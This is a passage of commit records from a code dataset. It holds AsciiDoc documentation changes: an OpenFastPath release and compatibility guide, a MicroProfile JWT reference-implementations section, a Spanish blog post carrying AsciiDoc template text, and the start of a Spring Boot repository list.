Compatibility\n\nIt follows from the versioning scheme that within a release, API, ABI\nand CLI are backwards compatible. Beyond that, version numbers are\nneeded to determine whether two releases are compatible or not.\n\nEach library is separately versioned, so it's possible for a\nparticular library to be ABI compatible across different releases or\neven across different major versions.\n\n\n\n== Requirements\n\nRelease Notes lists the requirements for each OFP release, including\nthe required version of OpenDataPlane (ODP). Newer compatible\nversions of ODP may be used. In ODP's four level versioning, as long\nas the first two levels remain the same, the API is compatible. Please\nsee <<ODPRG>> for more information on ODP release versioning.\n\n\n\n== Support\n\nAll serious bugs in the current General Availability release are fixed\non a best-effort basis. Bug fixes are integrated in a patch release.\nThe example applications in the examples directory may have a lower\nsupport priority than the core implementation.\n\nNew features and improvements are usually added only in new releases,\nalthough it's possible to add new features in a patch release as long\nas compatibility is preserved.\n\n\n\n== Release Contents\n\nAn OFP release consists of the following source code and documentation:\n\n* Release Announcement on the OFP announcements page and on the\n mailing list, which states the name, version and date of the\n release, and contains a link to the Release Notes.\n\n* Release Notes, which includes information about requirements, the\n release life cycle, changes since last release and known\n issues. Release Notes are archived on the OFP Release Archive page\n <<relarch>>.\n\n* Release tag in the OFP repository <<repo>>, and all the content in\n the repository that the release tag points to.\n\n\n\n== Release Life Cycle\n\n* The stages of a release are:\n\n Development:: In this stage, new features are being developed and\n old features may be modified or even removed. The API, ABI and\n CLI may be unstable.\n\n Release Candidate:: Once all features have been implemented and\n API finalized, a feature freeze, which implies API, ABI and\n CLI freeze, may be initiated and the release moved to the\n release candidate stage. Release candidates are tagged. If\n issues are found, a correction is made and a new release\n candidate is tagged. Even though the API is frozen, bugs in\n the API may still be corrected in this stage. Once a release\n enters the Release Candidate stage, the next release enters\n Development stage.\n\n General Availability:: A release may enter this stage once the\n following criteria are met:\n\n *** All automated test cases pass.\n\n *** At least one week has passed since the last release\n candidate was tagged, and no issues requiring a correction\n have been found.\n\n *** All release content, listed in the\n <<_release_contents,Release Contents>> section, is\n available.\n\n End of Life:: A release enters End of Life stage once the next\n release enters General Availability stage. In the End of Life\n stage, no changes are made to the release and bug reports are\n not necessarily accepted anymore. Even if a bug report is\n accepted, the correction will only be done to the current\n release.\n\n* Only one release at a time is maintained (in General Availability\n stage).\n\n* General Availability stage lasts for at least five months.\n\n* OFP aims to adapt to new ODP releases within one month of the ODP\n release. This usually necessitates a new OFP release.\n\n* Stage transitions are communicated on the announcements page and\n mailing list at least one week beforehand, End of Life at least one\n month beforehand.\n\n* The decisions and approvals related to transitions between these\n stages are the responsibility of the TSC, based on the criteria\n above and inputs and comments from OFP members.\n\n\n\n== References\n\n[bibliography]\n\n* [[[ODPRG]]] ODP Release Guide.\n http:\/\/docs.opendataplane.org\/snapshots\/odp-publish\/generic\/usr_html\/latest\/master\/linux-generic\/output\/release-guide.html\n\n* [[[relarch]]] OFP Release Archive.\n http:\/\/www.openfastpath.org\/index.php\/service\/releasearchives\/\n\n* [[[repo]]] OFP Repository. https:\/\/github.com\/OpenFastPath\/ofp\n\n* [[[semver]]] Semantic Versioning 2.0.0.\n http:\/\/semver.org\/spec\/v2.0.0.html\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b2fad5ef41524a1e140d4945166e8b830a52dfba","subject":"update the reference implementations section","message":"update the reference implementations section\n\nSigned-off-by: Scott Stark <44b2f47f410f4bf6655e3ec1c92f766044282b1f@gmail.com>\n","repos":"MicroProfileJWT\/microprofile-jwt-auth,MicroProfileJWT\/microprofile-jwt-auth","old_file":"spec\/src\/main\/asciidoc\/refimpl.asciidoc","new_file":"spec\/src\/main\/asciidoc\/refimpl.asciidoc","new_contents":"\/\/\n\/\/ Copyright (c) 2016-2017 Eclipse Microprofile Contributors:\n\/\/ Red Hat\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n\n## Reference Implementations\n\nThis sections references known reference implementations of the Eclise MicroProfile JWT RBAC authorization specification.\n\n### General Java EE\/SE based Implementations\n\nA baseline reference implementation that is available under the ASLv2 license\ncan be found at https:\/\/github.com\/starksm64\/microprofile-jwt-auth-ri. The purpose\nof this RI is to offer reusable code for integration of the JWT RBAC authenticaiton\nand authorization spec in various container environments. This particular implementation contains:\n\n* a default implementation of the JWTPrincipal interface\n* a JAX-RS ContainerRequestFilter prototype\n* JSR-375 IdentityStore and Credential prototypes\n* TODO: a JSR-196 ServerAuthModule\n\n### Wildfly Swarm Implementations\n\nA reference implementation for a custom auth-method of MP-JWT with the Wildfly\/Wildfly-Swarm Undertow web container\navailable under the ASLv2 license can be found at https:\/\/github.com\/starksm64\/microprofile-jwt-auth-wfswarm.\n","old_contents":"\/\/\n\/\/ Copyright (c) 2016-2017 Eclipse Microprofile Contributors:\n\/\/ Red Hat\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n\n## Reference Implementation\nA baseline reference implementation that is available under the ASLv2 license\ncan be found at https:\/\/github.com\/starksm64\/microprofile-jwt-auth-ri. The purpose\nof this RI is to offering reusable code for integration of the JWT RBAC authenticaiton\nand authorization in various container environments.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca0274ef8eb4d5221ac0410d47ae99e5ad4a11ea","subject":"Update 2015-02-10-Por-que-amo-lo-que-hago.adoc","message":"Update 2015-02-10-Por-que-amo-lo-que-hago.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-02-10-Por-que-amo-lo-que-hago.adoc","new_file":"_posts\/2015-02-10-Por-que-amo-lo-que-hago.adoc","new_contents":"= Por que amo lo que hago! \nJavier Le\u00f3n (@jelitox) <jel1284@gmail.com>\nv1.0, 2015-02-13\n:toc:\n:imagesdir: assets\/images\n:homepage: http:\/\/blog.javierleon.com.ve\n:hp-tags: Blog,Personal\n\/\/ Web page meta data.\n:keywords: Blog, Javier Le\u00f3n, IT, Devops, Desarrollo, Sysadmin, Social, Networks, emprendimiento, Pagina Oficial,\n:description: Blog personal y Profesional, +\nIngeniero en Informatica, desarrollador y Administrador de Sistemas e infraestructura, +\nRedes Sociales, facebook, instagram, twitter, pinterest +\nproyectos de emprendimiento Freenlance, +\nPagina principal.\n\n.{revdate}: {revnumber} \n*******************************************************************\n[quote, Steve jobs]\nTu trabajo va a llenar gran parte de tu vida, y la \u00fanica forma de estar realmente satisfecho con \u00e9l es hacer lo que creas que es un gran trabajo. Y la \u00fanica manera de hacer un trabajo genial es amar lo que haces. Si no lo has encontrado, sigue buscando. No te detengas. Al igual que con todos los asuntos del coraz\u00f3n, lo sabr\u00e1s cuando lo encuentres. Y, como cualquier gran relaci\u00f3n, s\u00f3lo se pondr\u00e1 mejor y mejor, conforme los a\u00f1os pasen. As\u00ed que sigue buscando hasta que lo encuentres. No te detengas.\n____\n\n*******************************************************************\nIntroduction\n------------\n{description}\n\nAsciiDoc is highly configurable: both the AsciiDoc source file syntax \nand the backend output markups (which can be almost any type of\nSGML\/XML markup) can be customized and extended by the user.\n\nAsciiDoc is free software and is licenced under the terms of the 'GNU\nGeneral Public License version 2' (GPLv2).\n\nTIP: The pages you are reading were written using AsciiDoc, to view\nthe corresponding AsciiDoc source click on the *Page Source* menu item\nin the left hand margin.\n\n\nOverview and Examples\n---------------------\nYou write an AsciiDoc document the same way you would write a\nnormal text document, there are no markup tags or weird format\nnotations. AsciiDoc files are designed to be viewed, edited and\nprinted directly or translated to other presentation formats using\nthe asciidoc(1) command.\n\nThe asciidoc(1) command translates AsciiDoc files to HTML, XHTML and\nDocBook markups. DocBook can be post-processed to presentation\nformats such as HTML, PDF, EPUB, DVI, LaTeX, roff, and Postscript\nusing readily available Open Source tools.\n\nExample Articles\n~~~~~~~~~~~~~~~~\n- This XHTML version of the\nlink:asciidoc.css-embedded.html[AsciiDoc User Guide]\nwas generated by AsciiDoc from\nlink:asciidoc.txt[this AsciiDoc file].\n\n- Here's the link:asciidoc.html[same document] created by first\ngenerating DocBook markup using AsciiDoc and then converting the\nDocBook markup to HTML using 'DocBook XSL Stylesheets'.\n\n- The User Guide again, this time a\nlink:chunked\/index.html[chunked version].\n\n- AsciiDoc generated this link:article-standalone.html[stand-alone\nHTML file] containing embedded CSS, JavaScript and images from this\nlink:article.txt[AsciiDoc article template] with this command:\n\nasciidoc -a data-uri -a icons -a toc -a max-width=55em article.txt\n\n- The same link:article.txt[AsciiDoc article template] generated\nlink:article-html5-toc2.html[this HTML 5] (the 'toc2' attribute puts\na table of contents in the left margin) from this command:\n\nasciidoc -b html5 -a icons -a toc2 -a theme=flask article.txt\n\n- The same link:article.txt[AsciiDoc article template] produced\nthis link:article.html[HTML file] and this\nlink:article.pdf[PDF file] via DocBook markup generated by AsciiDoc.\n\n[[X7]]\nExample Books\n~~~~~~~~~~~~~\nAsciiDoc markup supports all the standard DocBook frontmatter and\nbackmatter sections (dedication, preface, bibliography, glossary,\nindex, colophon) plus footnotes and index entries.\n\n- This link:book.txt[AsciiDoc book] produced link:book.html[this HTML\nfile] using the 'DocBook XSL Stylesheets'.\n- The link:asciidoc.pdf[PDF formatted AsciiDoc User Guide] was\ngenerated from asciidoc(1) DocBook output.\n- The link:asciidoc.epub[EPUB formatted AsciiDoc User Guide] was\ngenerated using link:a2x.1.html[a2x].\n- This link:book.epub[EPUB formatted book skeleton] was generated\nusing link:a2x.1.html[a2x].\n- This link:book-multi.txt[multi-part AsciiDoc book] produced\nlink:book-multi.html[this HTML file] using the 'DocBook XSL\nStylesheets'.\n\nExample UNIX Man Pages\n~~~~~~~~~~~~~~~~~~~~~~\nHTML formatted AsciiDoc man pages\nlink:asciidoc.1.css-embedded.html[with stylesheets] and\nlink:asciidoc.1.html[without stylesheets] were generated by AsciiDoc\nfrom link:asciidoc.1.txt[this file].\n\nThis link:asciidoc.1[roff formatted man page] was generated from\nasciidoc(1) DocBook output using `xsltproc(1)` and DocBook XSL\nStylesheets.\n\n[[X8]]\nExample Slideshows\n~~~~~~~~~~~~~~~~~~\nThe http:\/\/www.w3.org\/Talks\/Tools\/Slidy2\/[Slidy] backend generates\nHTML slideshows that can be viewed in any web browser. What's nice is\nthat you can create completely self contained slideshows including\nembedded images.\n\n- Here is the link:slidy.html[slidy backend documentation] slideshow\nand here is it's link:slidy.txt[AsciiDoc source].\n- An link:slidy-example.html[example slidy slideshow] and the\nlink:slidy-example.txt[AsciiDoc source].\n\nExample Web Site\n~~~~~~~~~~~~~~~~\nThe link:README-website.html[AsciiDoc website] is included in the\nAsciiDoc distribution (in `.\/examples\/website\/`) as an example website\nbuilt using AsciiDoc. See `.\/examples\/website\/README-website.txt`.\n","old_contents":"= Por que amo lo que hago! \nJavier Le\u00f3n (@jelitox) <jel1284@gmail.com>\nv1.0, 2015-02-13\n:toc:\n:imagesdir: assets\/images\n:homepage: http:\/\/blog.javierleon.com.ve\n:hp-tags: Blog,Personal\n\/\/ Web page meta data.\n:keywords: Blog, Javier Le\u00f3n, IT, Devops, Desarrollo, Sysadmin, Social, Networks, emprendimiento, Pagina Oficial,\n:description: Blog personal y Profesional, +\nIngeniero en Informatica, desarrollador y Administrador de Sistemas e infraestructura, +\nRedes Sociales, facebook, instagram, twitter, pinterest +\nproyectos de emprendimiento Freenlance, +\nPagina principal.\n\n.{revdate}: {revnumber} \n[quote, Steve jobs]\nTu trabajo va a llenar gran parte de tu vida, y la \u00fanica forma de estar realmente satisfecho con \u00e9l es hacer lo que creas que es un gran trabajo. Y la \u00fanica manera de hacer un trabajo genial es amar lo que haces. Si no lo has encontrado, sigue buscando. No te detengas. Al igual que con todos los asuntos del coraz\u00f3n, lo sabr\u00e1s cuando lo encuentres. Y, como cualquier gran relaci\u00f3n, s\u00f3lo se pondr\u00e1 mejor y mejor, conforme los a\u00f1os pasen. As\u00ed que sigue buscando hasta que lo encuentres. No te detengas.\n____\n\n*******************************************************************\nIntroduction\n------------\n{description}\n\nAsciiDoc is highly configurable: both the AsciiDoc source file syntax \nand the backend output markups (which can be almost any type of\nSGML\/XML markup) can be customized and extended by the user.\n\nAsciiDoc is free software and is licenced under the terms of the 'GNU\nGeneral Public License version 2' (GPLv2).\n\nTIP: The pages you are reading were written using AsciiDoc, to view\nthe corresponding AsciiDoc source click on the *Page Source* menu item\nin the left hand margin.\n\n\nOverview and Examples\n---------------------\nYou write an AsciiDoc document the same way you would write a\nnormal text document, there are no markup tags or weird format\nnotations. AsciiDoc files are designed to be viewed, edited and\nprinted directly or translated to other presentation formats using\nthe asciidoc(1) command.\n\nThe asciidoc(1) command translates AsciiDoc files to HTML, XHTML and\nDocBook markups. DocBook can be post-processed to presentation\nformats such as HTML, PDF, EPUB, DVI, LaTeX, roff, and Postscript\nusing readily available Open Source tools.\n\nExample Articles\n~~~~~~~~~~~~~~~~\n- This XHTML version of the\nlink:asciidoc.css-embedded.html[AsciiDoc User Guide]\nwas generated by AsciiDoc from\nlink:asciidoc.txt[this AsciiDoc file].\n\n- Here's the link:asciidoc.html[same document] created by first\ngenerating DocBook markup using AsciiDoc and then converting the\nDocBook markup to HTML using 'DocBook XSL Stylesheets'.\n\n- The User Guide again, this time a\nlink:chunked\/index.html[chunked version].\n\n- AsciiDoc generated this link:article-standalone.html[stand-alone\nHTML file] containing embedded CSS, JavaScript and images from this\nlink:article.txt[AsciiDoc article template] with this command:\n\nasciidoc -a data-uri -a icons -a toc -a max-width=55em article.txt\n\n- The same link:article.txt[AsciiDoc article template] generated\nlink:article-html5-toc2.html[this HTML 5] (the 'toc2' attribute puts\na table of contents in the left margin) from this command:\n\nasciidoc -b html5 -a icons -a toc2 -a theme=flask article.txt\n\n- The same link:article.txt[AsciiDoc article template] produced\nthis link:article.html[HTML file] and this\nlink:article.pdf[PDF file] via DocBook markup generated by AsciiDoc.\n\n[[X7]]\nExample Books\n~~~~~~~~~~~~~\nAsciiDoc markup supports all the standard DocBook frontmatter and\nbackmatter sections (dedication, preface, bibliography, glossary,\nindex, colophon) plus footnotes and index entries.\n\n- This link:book.txt[AsciiDoc book] produced link:book.html[this HTML\nfile] using the 'DocBook XSL Stylesheets'.\n- The link:asciidoc.pdf[PDF formatted AsciiDoc User Guide] was\ngenerated from asciidoc(1) DocBook output.\n- The link:asciidoc.epub[EPUB formatted AsciiDoc User Guide] was\ngenerated using link:a2x.1.html[a2x].\n- This link:book.epub[EPUB formatted book skeleton] was generated\nusing link:a2x.1.html[a2x].\n- This link:book-multi.txt[multi-part AsciiDoc book] produced\nlink:book-multi.html[this HTML file] using the 'DocBook XSL\nStylesheets'.\n\nExample UNIX Man Pages\n~~~~~~~~~~~~~~~~~~~~~~\nHTML formatted AsciiDoc man pages\nlink:asciidoc.1.css-embedded.html[with stylesheets] and\nlink:asciidoc.1.html[without stylesheets] were generated by AsciiDoc\nfrom link:asciidoc.1.txt[this file].\n\nThis link:asciidoc.1[roff formatted man page] was generated from\nasciidoc(1) DocBook output using `xsltproc(1)` and DocBook XSL\nStylesheets.\n\n[[X8]]\nExample Slideshows\n~~~~~~~~~~~~~~~~~~\nThe http:\/\/www.w3.org\/Talks\/Tools\/Slidy2\/[Slidy] backend generates\nHTML slideshows that can be viewed in any web browser. What's nice is\nthat you can create completely self contained slideshows including\nembedded images.\n\n- Here is the link:slidy.html[slidy backend documentation] slideshow\nand here is it's link:slidy.txt[AsciiDoc source].\n- An link:slidy-example.html[example slidy slideshow] and the\nlink:slidy-example.txt[AsciiDoc source].\n\nExample Web Site\n~~~~~~~~~~~~~~~~\nThe link:README-website.html[AsciiDoc website] is included in the\nAsciiDoc distribution (in `.\/examples\/website\/`) as an example website\nbuilt using AsciiDoc. See `.\/examples\/website\/README-website.txt`.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"a4e08beebcfc4c1eb0e41e4d53b28f67664706a0","subject":"Add missing variable to the example in the Loading YAML section","message":"Add missing variable to the example in the Loading YAML section\n\nCloses gh-1524\n","repos":"joansmith\/spring-boot,jrrickard\/spring-boot,ydsakyclguozi\/spring-boot,soul2zimate\/spring-boot,MasterRoots\/spring-boot,olivergierke\/spring-boot,nelswadycki\/spring-boot,xwjxwj30abc\/spring-boot,bjornlindstrom\/spring-boot,yuxiaole\/spring-boot,crackien\/spring-boot,javyzheng\/spring-boot,felipeg48\/spring-boot,drunklite\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,Buzzardo\/spring-boot,AngusZhu\/spring-boot,mbnshankar\/spring-boot,mackeprm\/spring-boot,jxblum\/spring-boot,tan9\/spring-boot,meftaul\/spring-boot,nisuhw\/spring-boot,jforge\/spring-boot,RishikeshDarandale\/spring-boot,candrews\/spring-boot,rickeysu\/spring-boot,sbcoba\/spring-boot,ApiSecRay\/spring-boot,scottfrederick\/spring-boot,tan9\/spring-boot,jrrickard\/spring-boot,liupd\/spring-boot,Pokbab\/spring-boot,izestrea\/spring-boot,aahlenst\/spring-boot,nisuhw\/spring-boot,jmnarloch\/spring-boot,yunbian\/spring-boot,RichardCSantana\/spring-boot,duandf35\/spring-boot,mackeprm\/spring-boot,habuma\/spring-boot,SaravananParthasarathy\/SPSDemo,axelfontaine\/spring-boot,paweldolecinski\/spring-boot,RichardCSantana\/spring-boot,wwadge\/spring-boot,ptahchiev\/spring-boot,artembilan\/spring-boot,hqrt\/jenkins2-course-spring-boot,existmaster\/spring-boot,Xaerxess\/spring-boot,chrylis\/spring-boot,mbrukman\/spring-boot,AngusZhu\/spring-boot,auvik\/spring-boot,tsachev\/spring-boot,Pokbab\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,gregturn\/spring-boot,mohican0607\/spring-boot,dfa1\/spring-boot,eddumelendez\/spring-boot,johnktims\/spring-boot,sebastiankirsch\/spring-boot,roberthafner\/spring-boot,vpavic\/spring-boot,lif123\/spring-boot,Makhlab\/spring-boot,srinivasan01\/spring-boot,tsachev\/spring-boot,lucassaldanha\/spring-boot,zorosteven\/spring-boot,smilence1986\/spring-boot,prakashme\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot,qq83387856\/spring-boot,fulvio-m\/spring-boot,xingguang2013\/spring-boot,jcastaldoFoodEssentials\/spring-boot,htynkn\/spring-boot,mbogoevici\/spring-boot,na-na\/spring-boot,liupd\/spring-boot,nareshmiriyala\/spring-boot,jmnarloch\/spring-boot,mlc0202\/spring-boot,akmaharshi\/jenkins,jayeshmuralidharan\/spring-boot,mbogoevici\/spring-boot,jrrickard\/spring-boot,npcode\/spring-boot,tbbost\/spring-boot,lokbun\/spring-boot,vpavic\/spring-boot,ameraljovic\/spring-boot,sbuettner\/spring-boot,roymanish\/spring-boot,donhuvy\/spring-boot,mosoft521\/spring-boot,eliudiaz\/spring-boot,Nowheresly\/spring-boot,Chomeh\/spring-boot,ojacquemart\/spring-boot,jbovet\/spring-boot,fulvio-m\/spring-boot,roymanish\/spring-boot,htynkn\/spring-boot,orangesdk\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,166yuan\/spring-boot,deki\/spring-boot,neo4j-contrib\/spring-boot,xc145214\/spring-boot,xc145214\/spring-boot,hklv\/spring-boot,domix\/spring-boot,yunbian\/spring-boot,cbtpro\/spring-boot,10045125\/spring-boot,keithsjohnson\/spring-boot,peteyan\/spring-boot,snicoll\/spring-boot,krmcbride\/spring-boot,bbrouwer\/spring-boot,mbnshankar\/spring-boot,ihoneymon\/spring-boot,coolcao\/spring-boot,domix\/spring-boot,end-user\/spring-boot,vandan16\/Vandan,brettwooldridge\/spring-boot,rams2588\/spring-boot,fjlopez\/spring-boot,herau\/spring-boot,wilkinsona\/spring-boot,vakninr\/spring-boot,afroje-reshma\/spring-boot-sample,frost2014\/spring-boot,AstaTus\/spring-boot,ojacquemart\/spring-boot,Makhlab\/spring-boot,jeremiahmarks\/spring-boot,xialeizhou\/spring-boot,vpavic\/spring-boot,playleud\/spring-boot,murilobr\/spring-boot,royclarkson\/spring-boot,existmaster\/spring-boot,zorosteven\/spring-boot,joansmith\/spring-boot,lucassaldanha\/spring-boot,javyzheng\/spring-boot,mrumpf\/spring-boot,gauravbrills\/spring-boot,gorcz\/spring-boot,jforge\/spring-boot,xialeizhou\/spring-boot,jjankar\/spring-boot,lburgazzoli\/spring-boot,shangyi0102\/spring-boot,brettwooldridge\/spring-boot,mbrukman\/spring-boot,kamilszymanski\/spring-boot,allyjunio\/spring-boot,ChunPIG\/spring-boot,166yuan\/spring-boot,xdweleven\/spring-boot,Makhlab\/spring-boot,mdeinum\/spring-boot,isopov\/spring-boot,jayeshmuralidharan\/spring-boot,srinivasan01\/spring-boot,AngusZhu\/spring-boot,fireshort\/spring-boot,gregturn\/spring-boot,rickeysu\/spring-boot,prakashme\/spring-boot,bclozel\/spring-boot,linead\/spring-boot,liupd\/spring-boot,lif123\/spring-boot,ameraljovic\/spring-boot,zhanhb\/spring-boot,chrylis\/spring-boot,designreuse\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,yhj630520\/spring-boot,paddymahoney\/spring-boot,mouadtk\/spring-boot,kiranbpatil\/spring-boot,srikalyan\/spring-boot,tiarebalbi\/spring-boot,hqrt\/jenkins2-course-spring-boot,Charkui\/spring-boot,spring-projects\/spring-boot,shakuzen\/spring-boot,damoyang\/spring-boot,lburgazzoli\/spring-boot,jorgepgjr\/spring-boot,Makhlab\/spring-boot,donhuvy\/spring-boot,donthadineshkumar\/spring-boot,hello2009chen\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,rickeysu\/spring-boot,MasterRoots\/spring-boot,lenicliu\/spring-boot,philwebb\/spring-boot-concourse,ameraljovic\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,AstaTus\/spring-boot,cleverjava\/jenkins2-course-spring-boot,DONIKAN\/spring-boot,dnsw83\/spring-boot,bjornlindstrom\/spring-boot,lokbun\/spring-boot,candrews\/spring-boot,domix\/spring-boot,tbbost\/spring-boot,nghiavo\/spring-boot,gorcz\/spring-boot,yhj630520\/spring-boot,srinivasan01\/spring-boot,neo4j-contrib\/spring-boot,thomasdarimont\/spring-boot,htynkn\/spring-boot,pnambiarsf\/spring-boot,tbadie\/spring-boot,ollie314\/spring-boot,mohican0607\/spring-boot,prasenjit-net\/spring-boot,tbbost\/spring-boot,javyzheng\/spring-boot,minmay\/spring-boot,simonnordberg\/spring-boot,zhanhb\/spring-boot,mlc0202\/spring-boot,mike-kukla\/spring-boot,dreis2211\/spring-boot,VitDevelop\/spring-boot,coolcao\/spring-boot,philwebb\/spring-boot-concourse,nisuhw\/spring-boot,keithsjohnson\/spring-boot,mouadtk\/spring-boot,zhangshuangquan\/spring-root,rajendra-chola\/jenkins2-course-spring-boot,paddymahoney\/spring-boot,durai145\/spring-boot,jxblum\/spring-boot,nurkiewicz\/spring-boot,master-slave\/spring-boot,sbuettner\/spring-boot,bclozel\/spring-boot,ptahchiev\/spring-boot,drumonii\/spring-boot,mouadtk\/spring-boot,habuma\/spring-boot,akmaharshi\/jenkins,MrMitchellMoore\/spring-boot,spring-projects\/spring-boot,panbiping\/spring-boot,panbiping\/spring-boot,dreis2211\/spring-boot,soul2zimate\/spring-boot,Chomeh\/spring-boot,nghialunhaiha\/spring-boot,keithsjohnson\/spring-boot,i007422\/jenkins2-course-spring-boot,chrylis\/spring-boot,mebinjacob\/spring-boot,meftaul\/spring-boot,nghialunhaiha\/spring-boot,designreuse\/spring-boot,eric-stanley\/spring-boot,krmcbride\/spring-boot,hello2009chen\/spring-boot,isopov\/spring-boot,dfa1\/spring-boot,qerub\/spring-boot,rweisleder\/spring-boot,herau\/spring-boot,RobertNickens\/spring-boot,joansmith\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,balajinsr\/spring-boot,allyjunio\/spring-boot,nareshmiriyala\/spring-boot,mrumpf\/spring-boot,krmcbride\/spring-boot,RainPlanter\/spring-boot,damoyang\/spring-boot,okba1\/spring-boot,jmnarloch\/spring-boot,SPNilsen\/spring-boot,olivergierke\/spring-boot,mosoft521\/spring-boot,navarrogabriela\/spring-boot,AstaTus\/spring-boot,lucassaldanha\/spring-boot,bjornlindstrom\/spring-boot,domix\/spring-boot,marcellodesales\/spring-boot,vandan16\/Vandan,rams2588\/spring-boot,MasterRoots\/spring-boot,jorgepgjr\/spring-boot,duandf35\/spring-boot,balajinsr\/spring-boot,xwjxwj30abc\/spring-boot,christian-posta\/spring-boot,fogone\/spring-boot,herau\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,gauravbrills\/spring-boot,nareshmiriyala\/spring-boot,srikalyan\/spring-boot,fjlopez\/spring-boot,mlc0202\/spring-boot,smilence1986\/spring-boot,wwadge\/spring-boot,mdeinum\/spring-boot,habuma\/spring-boot,jayarampradhan\/spring-boot,ptahchiev\/spring-boot,domix\/spring-boot,lucassaldanha\/spring-boot,nevenc-pivotal\/spring-boot,axibase\/spring-boot,herau\/spring-boot,balajinsr\/spring-boot,lenicliu\/spring-boot,RichardCSantana\/spring-boot,NetoDevel\/spring-boot,ApiSecRay\/spring-boot,qerub\/spring-boot,vaseemahmed01\/spring-boot,prasenjit-net\/spring-boot,trecloux\/spring-boot,rams2588\/spring-boot,DONIKAN\/spring-boot,trecloux\/spring-boot,philwebb\/spring-boot,qerub\/spring-boot,gauravbrills\/spring-boot,cmsandiga\/spring-boot,Charkui\/spring-boot,vandan16\/Vandan,nelswadycki\/spring-boot,jjankar\/spring-boot,felipeg48\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot-concourse,rmoorman\/spring-boot,paddymahoney\/spring-boot,JiweiWong\/spring-boot,jack-luj\/spring-boot,ameraljovic\/spring-boot,ilayaperumalg\/spring-boot,sankin\/spring-boot,shakuzen\/spring-boot,nandakishorm\/spring-boot,imranansari\/spring-boot,lingounet\/spring-boot,marcellodesales\/spring-boot,SPNilsen\/spring-boot,joshiste\/spring-boot,patrikbeno\/spring-boot,huangyugui\/spring-boot,buobao\/spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,izeye\/spring-boot,gorcz\/spring-boot,npcode\/spring-boot,bijukunjummen\/spring-boot,qerub\/spring-boot,aahlenst\/spring-boot,tan9\/spring-boot,RishikeshDarandale\/spring-boot,paweldolecinski\/spring-boot,ollie314\/spring-boot,duandf35\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,huangyugui\/spring-boot,mbenson\/spring-boot,ihoneymon\/spring-boot,krmcbride\/spring-boot,VitDevelop\/spring-boot,mbrukman\/spring-boot,afroje-reshma\/spring-boot-sample,jayarampradhan\/spring-boot,ralenmandao\/spring-boot,MasterRoots\/spring-boot,lexandro\/spring-boot,joshthornhill\/spring-boot,RainPlanter\/spring-boot,nareshmiriyala\/spring-boot,krmcbride\/spring-boot,jeremiahmarks\/spring-boot,sankin\/spring-boot,xc145214\/spring-boot,habuma\/spring-boot,clarklj001\/spring-boot,zhangshuangquan\/spring-root,nurkiewicz\/spring-boot,hklv\/spring-boot,nandakishorm\/spring-boot,pnambiarsf\/spring-boot,mike-kukla\/spring-boot,mabernardo\/spring-boot,mrumpf\/spring-boot,Xaerxess\/spring-boot,ollie314\/spring-boot,panbiping\/spring-boot,candrews\/spring-boot,sebastiankirsch\/spring-boot,fogone\/spring-boot,gauravbrills\/spring-boot,lenicliu\/spring-boot,fjlopez\/spring-boot,ihoneymon\/spring-boot,imranansari\/spring-boot,felipeg48\/spring-boot,nebhale\/spring-boot,wilkinsona\/spring-boot,imranansari\/spring-boot,Pokbab\/spring-boot,SPNilsen\/spring-boot,meftaul\/spring-boot,joshthornhill\/spring-boot,lburgazzoli\/spring-boot,thomasdarimont\/spring-boot,pvorb\/spring-boot,donthadineshkumar\/spring-boot,nevenc-pivotal\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,nelswadycki\/spring-boot,ojacquemart\/spring-boot,shangyi0102\/spring-boot,end-user\/spring-boot,ralenmandao\/spring-boot,mosoft521\/spring-boot,10045125\/spring-boot,RobertNickens\/spring-boot,qq83387856\/spring-boot,frost2014\/spring-boot,rickeysu\/spring-boot,liupugong\/spring-boot,end-user\/spring-boot,rstirling\/spring-boot,M3lkior\/spring-boot,lexandro\/spring-boot,simonnordberg\/spring-boot,sungha\/spring-boot,mabernardo\/spring-boot,i007422\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,scottfrederick\/spring-boot,jmnarloch\/spring-boot,Nowheresly\/spring-boot,soul2zimate\/spring-boot,VitDevelop\/spring-boot,frost2014\/spring-boot,cmsandiga\/spring-boot,huangyugui\/spring-boot,olivergierke\/spring-boot,rizwan18\/spring-boot,tiarebalbi\/spring-boot,jeremiahmarks\/spring-boot,AngusZhu\/spring-boot,bbrouwer\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,christian-posta\/spring-boot,ChunPIG\/spring-boot,kayelau\/spring-boot,eonezhang\/spring-boot,mouadtk\/spring-b